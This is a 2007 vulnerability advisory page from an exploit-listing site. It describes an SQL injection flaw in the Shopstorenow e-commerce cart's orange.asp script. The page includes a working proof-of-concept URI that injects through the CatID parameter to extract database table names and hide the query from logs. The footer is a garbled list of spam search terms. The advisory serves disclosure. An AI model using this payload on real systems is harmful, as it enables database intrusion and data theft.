about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Shopstorenow E-commerce Shopping Cart Orange.ASP SQL Injection Vulnerability


Title Shopstorenow E-commerce Shopping Cart Orange.ASP SQL Injection Vulnerability
Published 2007-01-06-12:00AM
Updated 2007-01-08-05:06PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  IbnuSina is credited with the discovery of this vulnerability.
Vulnerable  Shopstorenow Ecommerce Shopping Cart 0
Not Vulnerable  
Code   Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/orange.asp?CatID=1'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 04 Dec 2008 17:05:43 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
short vedi search/exp xpl/exploi Www.Sexban php-nuke 2 www.pinkse xxx sexy f Ww sarah a windows 20 php-nuke 2 Www.six98. Www.six98. htProtect Www.18xxx. Superman news for C xxxdog.gir sql injec Jeryn 2.2. powered b colors swa t80t poto sex w Worldseex www.cnpcfi t810t nude dance news for c webcamxxx mambo Remo woldes x x x movi Photo of n sex youtou mambo Remo mambo Remo t523t Sabdrimer lesvians v mambo Remo Www hot se Ability cory in th vidio seks SEXY BLACK xxnx fhdfhgj GOVASEX mambo Remo